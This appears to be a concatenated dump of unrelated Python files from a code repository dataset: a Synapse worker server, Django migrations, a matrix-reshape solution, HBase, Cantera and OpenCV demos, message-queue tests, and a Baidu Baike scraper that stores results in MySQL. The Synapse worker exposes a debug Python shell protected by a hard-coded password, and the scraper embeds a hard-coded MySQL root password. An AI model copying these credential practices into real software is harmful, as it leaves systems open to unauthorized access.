logger = logging.getLogger("synapse.app.federation_reader")
class ClientReaderSlavedStore(
    SlavedEventStore,
    SlavedKeyStore,
    RoomStore,
    DirectoryStore,
    SlavedApplicationServiceStore,
    SlavedRegistrationStore,
    BaseSlavedStore,
    ClientIpStore, # After BaseSlavedStore because the constructor is different
):
    """Read-only datastore for the client-reader worker.

    Composed entirely from slaved store mixins; the base-class order
    defines the MRO (and hence which implementation wins), so do not
    reorder the bases casually.
    """
    pass
class ClientReaderServer(HomeServer):
    """Worker homeserver that serves the public room list over client HTTP."""
    def get_db_conn(self, run_new_connection=True):
        """Open a raw database connection using the configured engine.

        Any param beginning with cp_ is a parameter for adbapi, and should
        not be passed to the database engine.
        """
        db_params = {
            k: v for k, v in self.db_config.get("args", {}).items()
            if not k.startswith("cp_")
        }
        db_conn = self.database_engine.module.connect(**db_params)
        if run_new_connection:
            self.database_engine.on_new_connection(db_conn)
        return db_conn
    def setup(self):
        """Create the slaved datastore backing this worker."""
        logger.info("Setting up.")
        self.datastore = ClientReaderSlavedStore(self.get_db_conn(), self)
        logger.info("Finished setting up.")
    def _listen_http(self, listener_config):
        """Build the resource tree for one HTTP listener and start listening."""
        port = listener_config["port"]
        bind_address = listener_config.get("bind_address", "")
        site_tag = listener_config.get("tag", port)
        resources = {}
        for res in listener_config["resources"]:
            for name in res["names"]:
                if name == "metrics":
                    resources[METRICS_PREFIX] = MetricsResource(self)
                elif name == "client":
                    # Only the public room list servlet is exposed; the same
                    # resource is mounted under every client API prefix.
                    resource = JsonResource(self, canonical_json=False)
                    PublicRoomListRestServlet(self).register(resource)
                    resources.update({
                        "/_matrix/client/r0": resource,
                        "/_matrix/client/unstable": resource,
                        "/_matrix/client/v2_alpha": resource,
                        "/_matrix/client/api/v1": resource,
                    })
        root_resource = create_resource_tree(resources, Resource())
        reactor.listenTCP(
            port,
            SynapseSite(
                "synapse.access.http.%s" % (site_tag,),
                site_tag,
                listener_config,
                root_resource,
            ),
            interface=bind_address
        )
        logger.info("Synapse client reader now listening on port %d", port)
    def start_listening(self, listeners):
        """Start every configured listener (HTTP or debug manhole)."""
        for listener in listeners:
            if listener["type"] == "http":
                self._listen_http(listener)
            elif listener["type"] == "manhole":
                reactor.listenTCP(
                    listener["port"],
                    manhole(
                        username="matrix",
                        password="rabbithole",
                        globals={"hs": self},
                    ),
                    interface=listener.get("bind_address", '127.0.0.1')
                )
            else:
                logger.warn("Unrecognized listener type: %s", listener["type"])
    @defer.inlineCallbacks
    def replicate(self):
        """Long-poll the master's replication endpoint and apply updates forever."""
        http_client = self.get_simple_http_client()
        store = self.get_datastore()
        replication_url = self.config.worker_replication_url
        while True:
            try:
                args = store.stream_positions()
                args["timeout"] = 30000
                result = yield http_client.get_json(replication_url, args=args)
                yield store.process_replication(result)
            except Exception:
                # BUG FIX: previously a bare ``except:``, which also swallowed
                # SystemExit/KeyboardInterrupt and GeneratorExit raised through
                # the inlineCallbacks generator.
                logger.exception("Error replicating from %r", replication_url)
                yield sleep(5)
def start(config_options):
    """Parse config, construct the client-reader worker and run the reactor.

    Exits with status 1 on invalid configuration. Blocks until the reactor
    stops; daemonizes first when worker_daemonize is configured.
    """
    try:
        config = HomeServerConfig.load_config(
            "Synapse client reader", config_options
        )
    except ConfigError as e:
        sys.stderr.write("\n" + e.message + "\n")
        sys.exit(1)
    assert config.worker_app == "synapse.app.client_reader"
    setup_logging(config.worker_log_config, config.worker_log_file)
    database_engine = create_engine(config.database_config)
    tls_server_context_factory = context_factory.ServerContextFactory(config)
    ss = ClientReaderServer(
        config.server_name,
        db_config=config.database_config,
        tls_server_context_factory=tls_server_context_factory,
        config=config,
        version_string="Synapse/" + get_version_string(synapse),
        database_engine=database_engine,
    )
    ss.setup()
    ss.get_handlers()
    ss.start_listening(config.worker_listeners)
    def run():
        # Runs the (blocking) twisted reactor with resource limits applied.
        with LoggingContext("run"):
            logger.info("Running")
            change_resource_limit(config.soft_file_limit)
            if config.gc_thresholds:
                gc.set_threshold(*config.gc_thresholds)
            reactor.run()
    def start():
        # NOTE: intentionally shadows the module-level start(); only invoked
        # via reactor.callWhenRunning below.
        ss.get_datastore().start_profiling()
        ss.replicate()
    reactor.callWhenRunning(start)
    if config.worker_daemonize:
        daemon = Daemonize(
            app="synapse-client-reader",
            pid=config.worker_pid_file,
            action=run,
            auto_close_fds=False,
            verbose=True,
            logger=logger,
        )
        daemon.start()
    else:
        run()
if __name__ == '__main__':
    with LoggingContext("main"):
        start(sys.argv[1:])
| Python | 0.999988 | |
a3a022a184694cf95bbc37e22c4329c6b3e400cd | 566. Reshape the Matrix | python/ReshapeTheMatrix.py | python/ReshapeTheMatrix.py | # -*- coding:utf-8 -*-
# @Author zpf
"""
You're given a matrix represented by a two-dimensional array,
and two positive integers r and c representing the row number and column number of the wanted reshaped matrix, respectively.
The reshaped matrix need to be filled with all the elements of the original matrix in the same row-traversing order as they were.
If the 'reshape' operation with given parameters is possible and legal, output the new reshaped matrix;
Otherwise, output the original matrix.
Example 1: Example 2:
Input: Input:
nums = nums =
[[1,2], [[1,2],
[3,4]] [3,4]]
r = 1, c = 4 r = 2, c = 4
Output: Output:
[[1,2,3,4]] [[1,2],
[3,4]]
Note:
The height and width of the given matrix is in range [1, 100].
The given r and c are all positive.
"""
class Solution(object):
    def matrixReshape(self, nums, r, c):
        """Reshape *nums* into an r x c matrix in row-major order.

        :type nums: List[List[int]]
        :type r: int
        :type c: int
        :rtype: List[List[int]] -- the reshaped matrix, or *nums* unchanged
            when the element counts do not match.
        """
        rows = len(nums)
        cols = len(nums[0])
        if rows * cols != r * c:
            return nums
        # Flatten row-major, then re-slice into rows of length c.
        flat = [value for row in nums for value in row]
        return [flat[start:start + c] for start in range(0, r * c, c)]
if __name__ == "__main__":
    # Quick sanity check: reshape a 2x2 matrix into 1x4 (example 1 above).
    sample = Solution()
    print(sample.matrixReshape(nums=[[1, 2], [3, 4]], r=1, c=4))
| Python | 0.999779 | |
d83b18ec4faa513c7171a23af5ba46397141519e | add main __init__.py | wingstructure/__init__.py | wingstructure/__init__.py | from . import analysis
from . import data
from . import liftingline
from . import structure
| Python | 0.000588 | |
81df43350fdcbde85780dfbf1101e47fff04dc6c | Add missing migration | resolwe/flow/migrations/0025_set_get_last_by.py | resolwe/flow/migrations/0025_set_get_last_by.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 12:42
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Set ``get_latest_by = 'version'`` on the versioned flow models.

    Only model Meta options change; no database schema is altered.
    """
    dependencies = [
        ('flow', '0024_add_relations'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='collection',
            options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_collection', 'Can view collection'), ('edit_collection', 'Can edit collection'), ('share_collection', 'Can share collection'), ('download_collection', 'Can download files from collection'), ('add_collection', 'Can add data objects to collection'), ('owner_collection', 'Is owner of the collection'))},
        ),
        migrations.AlterModelOptions(
            name='data',
            options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_data', 'Can view data'), ('edit_data', 'Can edit data'), ('share_data', 'Can share data'), ('download_data', 'Can download files from data'), ('owner_data', 'Is owner of the data'))},
        ),
        migrations.AlterModelOptions(
            name='descriptorschema',
            options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_descriptorschema', 'Can view descriptor schema'), ('edit_descriptorschema', 'Can edit descriptor schema'), ('share_descriptorschema', 'Can share descriptor schema'), ('owner_descriptorschema', 'Is owner of the description schema'))},
        ),
        migrations.AlterModelOptions(
            name='entity',
            options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_entity', 'Can view entity'), ('edit_entity', 'Can edit entity'), ('share_entity', 'Can share entity'), ('download_entity', 'Can download files from entity'), ('add_entity', 'Can add data objects to entity'), ('owner_entity', 'Is owner of the entity'))},
        ),
        migrations.AlterModelOptions(
            name='process',
            options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_process', 'Can view process'), ('share_process', 'Can share process'), ('owner_process', 'Is owner of the process'))},
        ),
        migrations.AlterModelOptions(
            name='storage',
            options={'default_permissions': (), 'get_latest_by': 'version'},
        ),
    ]
| Python | 0.0002 | |
7b2e28f9604347ff396b220c8d2ab7bdfdc671c8 | test hbase TSocket | test/test_hbase_TSocker0Err32/test_hbase.py | test/test_hbase_TSocker0Err32/test_hbase.py | import happybase
# gives error
# TSocket read 0 bytes
# [Errno 32] Broken pipe
# Minimal Python 2 repro script: fetch one row from an HBase table through
# happybase/Thrift, to reproduce the TSocket failure quoted above.
if __name__ == "__main__":
    conn = happybase.Connection(host="10.1.94.57")
    table_name = "escorts_images_sha1_infos_dev"
    hbase_table = conn.table(table_name)
    # Batch lookup by row key (a SHA1 hex digest).
    batch_list_queries = ["000421227D83DA48DB4A417FCEFCA68272398B8E"]
    # NOTE(review): the TSocket/broken-pipe error presumably surfaces on this
    # Thrift call -- unverified. The connection is never closed.
    rows = hbase_table.rows(batch_list_queries)
    print rows
| Python | 0.000001 | |
6d8e47f0b1bc70de7464303d6ac3b7684588a7aa | Add mpmodel | mpmodel/mpmodel.py | mpmodel/mpmodel.py | import tensorflow as tf
| Python | 0 | |
ad6e67d382df1018e4ae55ebdcb6fae1cca9bffe | Add merge migration | osf/migrations/0081_merge_20180212_0949.py | osf/migrations/0081_merge_20180212_0949.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-02-12 15:49
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Merge migration reconciling the 0080 and 0079 branches; no operations."""
    dependencies = [
        ('osf', '0080_ensure_schemas'),
        ('osf', '0079_merge_20180202_1206'),
    ]
    operations = [
    ]
| Python | 0.000001 | |
ec6b65513baa4532af7cad1bd6c98e162b3db9ef | Add multiprocessing example | interfaces/cython/cantera/examples/transport/multiprocessing_viscosity.py | interfaces/cython/cantera/examples/transport/multiprocessing_viscosity.py | """
This example demonstrates how Cantera can be used with the 'multiprocessing'
module.
Because Cantera Python objects are built on top of C++ objects which cannot be
passed between Python processes, it is necessary to set up the computation so
that each process has its own copy of the relevant Cantera objects. One way to
do this is by storing the objects in (module) global variables, which are
initialized once per worker process.
"""
import multiprocessing
import numpy as np
import cantera as ct
import itertools
from time import time
# Global storage for Cantera Solution objects
gases = {}
def init_process(mech):
    """
    Pool initializer, called once per worker process: build that worker's
    Solution object and store it in the module-global `gases` cache, keyed
    by mechanism file name.
    """
    solution = ct.Solution(mech)
    solution.transport_model = 'Multi'
    gases[mech] = solution
def get_thermal_conductivity(args):
    """Unpack (mech, T, P, X), set the gas state, return thermal conductivity.

    Pool.imap only permits a single argument, so everything is packed into
    the tuple 'args'.
    """
    mech, temperature, pressure, composition = args
    gas = gases[mech]
    gas.TPX = temperature, pressure, composition
    return gas.thermal_conductivity
def get_viscosity(args):
    """Unpack (mech, T, P, X), set the gas state, return the viscosity.

    Pool.imap only permits a single argument, so all of the needed
    arguments are packed into the tuple 'args'.
    """
    mech, T, P, X = args
    gas = gases[mech]
    gas.TPX = T, P, X
    # BUG FIX: this previously returned gas.enthalpy_mass, which is not a
    # viscosity at all; return the transport property the name promises.
    return gas.viscosity
def parallel(mech, predicate, nProcs, nTemps):
    """
    Call the function ``predicate`` on ``nProcs`` processors for ``nTemps``
    different temperatures, returning the list of results.
    """
    P = ct.one_atm
    X = 'CH4:1.0, O2:1.0, N2:3.76'
    pool = multiprocessing.Pool(processes=nProcs,
                                initializer=init_process,
                                initargs=(mech,))
    try:
        y = pool.map(predicate,
                     zip(itertools.repeat(mech),
                         np.linspace(300, 900, nTemps),
                         itertools.repeat(P),
                         itertools.repeat(X)))
    finally:
        # Shut the worker processes down; the original leaked the pool.
        pool.close()
        pool.join()
    return y
def serial(mech, predicate, nTemps):
    """Evaluate ``predicate`` for ``nTemps`` temperatures in this process."""
    P = ct.one_atm
    X = 'CH4:1.0, O2:1.0, N2:3.76'
    init_process(mech)
    # BUG FIX: materialize the map. On Python 3 ``map`` is lazy, so without
    # list() no work would actually happen inside the timing code in
    # __main__ and the serial timings would be meaningless. (On Python 2,
    # map already returned a list, so this is behavior-compatible.)
    y = list(map(predicate,
                 zip(itertools.repeat(mech),
                     np.linspace(300, 900, nTemps),
                     itertools.repeat(P),
                     itertools.repeat(X))))
    return y
if __name__ == '__main__':
    # Crude benchmark: time 1000 property evaluations with 4 worker
    # processes versus a single process, for a heavy and a light property.
    # For functions where the work done in each subprocess is substantial,
    # significant speedup can be obtained using the multiprocessing module.
    print('Thermal conductivity')
    t1 = time()
    parallel('gri30.xml', get_thermal_conductivity, 4, 1000)
    t2 = time()
    print('Parallel: {0:.3f} seconds'.format(t2-t1))
    t1 = time()
    serial('gri30.xml', get_thermal_conductivity, 1000)
    t2 = time()
    print('Serial: {0:.3f} seconds'.format(t2-t1))
    # On the other hand, if the work done per call to the predicate function is
    # small, there may be no advantage to using multiprocessing.
    print('\nViscosity')
    t1 = time()
    parallel('gri30.xml', get_viscosity, 4, 1000)
    t2 = time()
    print('Parallel: {0:.3f} seconds'.format(t2-t1))
    t1 = time()
    serial('gri30.xml', get_viscosity, 1000)
    t2 = time()
    print('Serial: {0:.3f} seconds'.format(t2-t1))
| Python | 0.000001 | |
3fbf2c29a54225e7d4dd882637e68cfe3a4d0101 | Add some tests for Message Queue | src/cobwebs/tests/test_mq.py | src/cobwebs/tests/test_mq.py | from cobwebs.mq.core import RPCLink, TopicsLink
from cobwebs.mq.backends.rabbitmq import driver
import pytest
import spider
import json
from unittest import mock
HOST = "127.0.0.1"
def test_driver_instance():
    # The rabbitmq backend must expose concrete instances of the two link
    # types imported from cobwebs.mq.core.
    assert isinstance(driver.rpc, RPCLink)
    assert isinstance(driver.topics, TopicsLink)
@mock.patch("cobwebs.mq.backends.rabbitmq")
def test_rpc(rabbitmq):
    """The RPC link should receive the queue name, JSON payload and host."""
    payload = json.dumps({"action": "list", "data": None})
    rabbitmq.rpc.send("db_driver", payload, HOST)
    rabbitmq.rpc.send.assert_called_with("db_driver", payload, HOST)
@mock.patch("cobwebs.mq.backends.rabbitmq")
def test_topic(rabbitmq):
    """Emitting on a topic should pass the routing key and message through."""
    rabbitmq.topic.emit(key="test", message="this is just a message")
    rabbitmq.topic.emit.assert_called_with(
        key="test", message="this is just a message")
| Python | 0 | |
144f867f91b637ccdb6b5535646f8884099b7a2f | add missing migration to make result of "migrate" match what the model file says | lava_scheduler_app/migrations/0010_auto__chg_field_testjob_description.py | lava_scheduler_app/migrations/0010_auto__chg_field_testjob_description.py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration: make TestJob.description nullable (max_length 200)."""
    def forwards(self, orm):
        """Apply: allow NULL in TestJob.description."""
        # Changing field 'TestJob.description'
        db.alter_column('lava_scheduler_app_testjob', 'description', self.gf('django.db.models.fields.CharField')(max_length=200, null=True))
    def backwards(self, orm):
        """Revert: make TestJob.description NOT NULL again."""
        # Changing field 'TestJob.description'
        db.alter_column('lava_scheduler_app_testjob', 'description', self.gf('django.db.models.fields.CharField')(max_length=200))
    # Frozen ORM snapshot generated by South -- do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'lava_scheduler_app.device': {
            'Meta': {'object_name': 'Device'},
            'current_job': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lava_scheduler_app.TestJob']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
            'device_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lava_scheduler_app.DeviceType']"}),
            'hostname': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
            'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
        },
        'lava_scheduler_app.devicetype': {
            'Meta': {'object_name': 'DeviceType'},
            'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True', 'db_index': 'True'})
        },
        'lava_scheduler_app.testjob': {
            'Meta': {'object_name': 'TestJob'},
            'actual_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.Device']"}),
            'definition': ('django.db.models.fields.TextField', [], {}),
            'description': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'log_file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'requested_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.Device']"}),
            'requested_device_type': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.DeviceType']"}),
            'results_link': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '400', 'null': 'True', 'blank': 'True'}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'submit_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'submitter': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        }
    }
    complete_apps = ['lava_scheduler_app']
| Python | 0.000001 | |
eca48495bdba121a0719bb442f5ec30b70233e74 | Add a snippet (Python OpenCV). | python/opencv/opencv_2/gui/opencv_trackbar.py | python/opencv/opencv_2/gui/opencv_trackbar.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Jérémie DECOCK (http://www.jdhp.org)
"""
OpenCV - Trackbar widget.
Required: opencv library (Debian: aptitude install python-opencv)
See: https://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_trackbar/py_trackbar.html#trackbar
"""
from __future__ import print_function
import cv2 as cv
import numpy as np
import argparse
def trackbar1_cb(x):
    """No-op callback for the threshold trackbar.

    OpenCV requires a callback, but the current value is read on demand
    with cv.getTrackbarPos() inside the main loop instead.
    """
def trackbar2_cb(x):
    """No-op callback for the max-value trackbar.

    OpenCV requires a callback, but the current value is read on demand
    with cv.getTrackbarPos() inside the main loop instead.
    """
def main():
    """Live camera demo: show a binary-threshold view driven by two trackbars.

    Opens camera ``--cameraid``, converts each frame to grayscale, thresholds
    it with the current trackbar values and displays both the original and
    thresholded streams until 'q' is pressed.
    """
    # Parse the program options (camera device id to open) ####################
    parser = argparse.ArgumentParser(description='An opencv snippet.')
    parser.add_argument("--cameraid", "-i", help="The camera ID number (default: 0)", type=int, default=0, metavar="INTEGER")
    args = parser.parse_args()
    device_number = args.cameraid
    # OpenCV ##################################################################
    video_capture = cv.VideoCapture(device_number)
    # Create a window
    window_name = "Threshold Bin"
    cv.namedWindow(window_name)
    # Create trackbars (values are polled in the loop, callbacks are no-ops)
    trackbar1_name = "Threshold"
    trackbar1_window_name = window_name
    trackbar1_default_value = 127
    trackbar1_maximum_value = 255
    trackbar1_callback_function = trackbar1_cb  # Executed every time the trackbar value changes
    cv.createTrackbar(trackbar1_name, trackbar1_window_name, trackbar1_default_value, trackbar1_maximum_value, trackbar1_callback_function)
    trackbar2_name = "Max value"
    trackbar2_window_name = window_name
    trackbar2_default_value = 255
    trackbar2_maximum_value = 255
    trackbar2_callback_function = trackbar2_cb  # Executed every time the trackbar value changes
    cv.createTrackbar(trackbar2_name, trackbar2_window_name, trackbar2_default_value, trackbar2_maximum_value, trackbar2_callback_function)
    print("Press q to quit.")
    while(True):
        # Capture frame-by-frame.
        # 'ret' is a boolean ('True' if frame is read correctly, 'False' otherwise).
        # 'img_bgr' is a numpy array (the captured frame).
        ret, img_bgr = video_capture.read()
        # IMAGE PROCESSING ################################
        # Convert BGR color space to Grayscale
        img_gray = cv.cvtColor(img_bgr, cv.COLOR_BGR2GRAY)
        # Threshold the Grayscale image: dst_i = (src_i > threshold_value) ? max_val : 0
        threshold_value = cv.getTrackbarPos(trackbar1_name, trackbar1_window_name)
        max_val = cv.getTrackbarPos(trackbar2_name, trackbar2_window_name)
        ret, img_threshold_bin = cv.threshold(img_gray, threshold_value, max_val, cv.THRESH_BINARY)
        # DISPLAY IMAGES ##################################
        # Display the resulting frame (BGR)
        cv.imshow('BGR (orignal)', img_bgr)
        # Display the resulting frames (Threshold)
        cv.imshow(window_name, img_threshold_bin)
        # KEYBOARD LISTENER ###############################
        if cv.waitKey(1) & 0xFF == ord('q'):
            break
    video_capture.release()
    cv.destroyAllWindows()
# Run the demo only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| Python | 0.000018 | |
9a17f2ec043ed8e3f61549104507a87d21ae39e1 | Create baike_spider.py | school/baike_spider.py | school/baike_spider.py | """
a web spider for baidu baike schools info in beijing
"""
import logging.handlers
import os
import urllib.parse
import pandas as pd
import pymysql.cursors
import requests
from bs4 import BeautifulSoup
from lxml import etree
LOG_FILE = 'baikespider.log'
handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes=1024 * 1024, backupCount=5)
fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'
formatter = logging.Formatter(fmt)
handler.setFormatter(formatter)
logger = logging.getLogger('baikespider')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
success_url_list = []
fail_url_list = []
class School():
    """Plain data holder for one school record scraped from Baidu Baike."""
    def __init__(self, name='', en_name='', nick_name='', xiaoxun='', introduction='', start_time='', level='',
                 location='', detailed_history='', facility=''):
        # Every field defaults to '' so a bare School() means "nothing parsed yet".
        self.name = name
        self.en_name = en_name
        self.nick_name = nick_name
        self.xiaoxun = xiaoxun
        self.introduction = introduction
        self.start_time = start_time
        self.level = level
        self.location = location
        self.detailed_history = detailed_history
        self.facility = facility
    def __str__(self):
        # Same "{ a ;b ;... ;i }" layout as before, built with a single join.
        # NOTE(review): nick_name is not part of the rendering — confirm intended.
        fields = (str(self.name), self.en_name, str(self.xiaoxun), str(self.introduction),
                  self.start_time, self.level, self.location, self.detailed_history, self.facility)
        return "{ " + " ;".join(fields) + " }"
def read_school_names(excel_path):
    """Return the school-name column ('名称') of Sheet1 as a plain list."""
    column = pd.read_excel(excel_path, sheetname="Sheet1", index_col=False)['名称']
    return column.tolist()
def crawl(school_name):
    """Fetch the Baidu Baike page for *school_name* and parse it into a School.

    Always returns a School instance.  On a non-200 response, or when any
    parsing step fails, the instance keeps its default empty fields; callers
    filter those out by checking ``school.name != ""``.
    """
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Host": "baike.baidu.com",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
    }
    request_url = "https://baike.baidu.com/item/%s" % urllib.parse.quote(school_name)
    response = requests.get(request_url, timeout=10, headers=headers)
    print('start crawling %s ' % school_name)
    # Created before branching so the non-200 path cannot raise
    # UnboundLocalError at the final `return school` (bug in the original).
    school = School()
    if response.status_code == 200:
        try:
            # Re-encode the Latin-1-decoded text as UTF-8.
            # NOTE(review): presumably works around a missing/wrong charset
            # header on the response — confirm.
            html_raw = response.text.encode("Latin").decode("UTF-8")
            soup = BeautifulSoup(html_raw, "html5lib")
            school.name = soup.find_all("h1")[0].get_text()  # school name
            school.introduction = soup.find_all(class_="para")[0].get_text().strip()  # introduction
            # The "basic info" box holds the structured fields, when present.
            if len(soup.find_all(class_="basic-info cmn-clearfix")) > 0:
                values = soup.find_all(class_="basicInfo-item value")
                school.en_name = values[1].get_text().strip()     # English name
                school.nick_name = values[2].get_text().strip()   # short name
                school.xiaoxun = values[3].get_text().strip()     # school motto
                school.start_time = values[4].get_text().strip()  # founding date
                school.level = values[5].get_text().strip()       # school type
                school.location = values[6].get_text().strip()    # address
                all_para_div = soup.find_all(class_="para")
                # Paragraphs 2..n-2 form the history text; the last paragraph
                # is the facilities description.
                school.detailed_history = "".join(
                    div.get_text().strip() for div in all_para_div[2:-1])
                school.facility = all_para_div[-1].get_text()
        except Exception:
            # Best effort: keep whatever fields were filled, but log the
            # failure instead of silently swallowing it (was a bare except).
            logger.exception("failed to parse baike page for %s", school_name)
    else:
        print('ERROR')
    return school
def crawl_text(school_name):
    """Download the Baike page for *school_name* and dump its main text to disk.

    Writes D:/schools/<school_name>.txt (UTF-8). Pages that show Baike's
    "page does not exist" placeholder are skipped.
    """
    text_dir = 'D:/schools/'
    if not os.path.exists(text_dir):
        os.makedirs(text_dir)
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Host": "baike.baidu.com",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
    }
    request_url = "https://baike.baidu.com/item/%s" % urllib.parse.quote(school_name)
    response = requests.get(request_url, timeout=10, headers=headers)
    print('start crawling %s ' % school_name)
    if response.status_code == 200:
        # Re-encode the Latin-1-decoded text as UTF-8 (same workaround as crawl()).
        html_raw = response.text.encode("Latin").decode("UTF-8")
        soup = BeautifulSoup(html_raw, "html5lib")
        # Skip Baike's "the page you visited does not exist" placeholder.
        if "您所访问的页面不存在..." not in soup.text:
            with open(os.path.join(text_dir, school_name + '.txt'), encoding='UTF-8', mode='wt') as f:
                f.write(soup.find_all(class_="main-content")[0].get_text())
                f.flush()
                f.close()
            # NOTE(review): uses the root logger here, unlike the module-level
            # 'baikespider' logger used elsewhere — confirm intended.
            logging.debug('%s has been written successfully~' % school_name)
        else:
            print("ERROR!")
def open_mysql():
    """Open a connection to the local 'hzau' MySQL database.

    Returns a pymysql connection configured with DictCursor, so query
    results come back as dicts.
    """
    # NOTE(review): credentials are hard-coded in source; move them to
    # configuration/environment before sharing this script.
    connection = pymysql.connect(host='localhost',
                                 user='root',
                                 password='19930620',
                                 db='hzau',
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor)
    return connection
def insert_to_mysql(school, connection):
    """Insert one School row into the `school` table and echo a sample row.

    Uses %s placeholders with a parameter tuple, so values are escaped by
    the driver (no SQL injection via scraped text).
    """
    try:
        with connection.cursor() as cursor:
            sql = "INSERT INTO school(name, en_name, nick_name, xiaoxun, introduction, start_time, level, location, detailed_history, facility)" \
                  " VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);"
            cursor.execute(sql, (
                school.name, school.en_name, school.nick_name, school.xiaoxun, school.introduction, school.start_time,
                school.level, school.location, school.detailed_history, school.facility))
        connection.commit()
        with connection.cursor() as cursor:
            # Read a single record (sanity check that the table has data).
            sql = "SELECT * FROM school"
            cursor.execute(sql)
            result = cursor.fetchone()
            print(result)
    except:
        # NOTE(review): bare except silently drops every DB error (duplicate
        # keys, lost connections, ...) — consider logging at minimum.
        pass
def close_mysql(connection):
    """Close the pymysql connection returned by open_mysql()."""
